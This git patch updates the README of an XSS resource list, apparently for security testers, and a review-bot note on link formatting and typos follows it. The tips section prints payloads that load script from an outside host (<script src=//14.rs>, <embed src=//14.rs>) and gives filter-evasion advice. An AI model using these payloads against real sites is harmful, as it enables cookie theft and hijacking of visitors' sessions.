From 1d33cd5ba5b7fc8cf67a87192935d24154f0d9bc Mon Sep 17 00:00:00 2001 From: Somdev Sangwan Date: Sun, 11 Mar 2018 21:21:25 +0530 Subject: [PATCH] Update README.md --- README.md | 69 ++++++++++++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 68 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 9b4944a..1402ee3 100644 --- a/README.md +++ b/README.md 
@@ -1,2 +1,69 @@ # AwesomeXSS -Awesome XSS stuff +Awesome XSS stuff. + +Put this repo on watch. I will be updating it regularly. +### Awesome Books +- [XSS Cheat Sheet By Brute Logic](http://google.com) + +### Awesome Websites +- [brutelogic.com.br](http://brutelogic.com.br) +- [respectxss.blogspot.in](https://respectxss.blogspot.in/) + +### Awesome People +- [Rodolfo Assis](https://twitter.com/brutelogic) +- [Ashar Javed](https://twitter.com/soaj1664ashar) +- [Somdev Sangwan](https://twitter.com/s0md3v) I own this repo, I can write whatever the fuck I want :v + +### Awesome Reads +- [XSS in Sarahah](http://www.shawarkhan.com/2017/08/sarahah-xss-exploitation-tool.html) + +### Awesome Presentations +- [How I met your girlfriend](https://www.youtube.com/watch?v=fWk_rMQiDGc) +- [How to Find 1,352 Wordpress XSS Plugin Vulnerabilities in one hour](https://www.youtube.com/watch?v=9ADubsByGos) +- [Blind XSS](https://www.youtube.com/watch?v=OT0fJEtz7aE) +- [Copy Pest](https://www.slideshare.net/x00mario/copypest) + +### Awesome Context Breaking + +#### Simple Context +``` + + +``` + +#### Attribute Context +``` +"> +"> +``` + +### Awesome Payloads +Come back later + + +### Awesome Tags & Event Handlers +Come back later + +### Awesome Methodology +Come back later + +### Awesome Tools +- (XSStrike)[http://xsstrike.tk/] + +### Awesome Tips & Tricks +- http:// can be shortened to // +- **document.cookie** can be shortened to **cookie**. It applies to other DOM objects as well. +- alert and other function don't need a value, so stop doing **alert(1)** and start doing **alert()** +- I have found that **confirm** is the least detected pop-up function so stop using alert. +- Quotes around attribute value aren't neccessary. You can use **<script src=//14.rs>** instead of **<script src="//14.rs"glt;** +- The shortest independent payload is **<embed src=//14.rs>** (19 chars)
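Review bot: The Awesome Tools entry is written as `(XSStrike)[http://xsstrike.tk/]`, with the parentheses and brackets swapped, so it will render as literal text instead of a link; it should be `[XSStrike](http://xsstrike.tk/)`. Under Awesome Books, the "XSS Cheat Sheet By Brute Logic" entry links to `http://google.com`, which looks like a placeholder; point it at the actual resource or hold the entry back until the URL is known. In Awesome Tips & Tricks, "neccessary" is misspelled and the second example in that bullet ends in `"glt;` where a closing `>` (or `&gt;`) appears to be intended. As a style point, add a blank line between "Put this repo on watch. I will be updating it regularly." and `### Awesome Books`, matching the spacing used before the other headings, and consider leaving out the three sections whose only content is "Come back later" until they have entries.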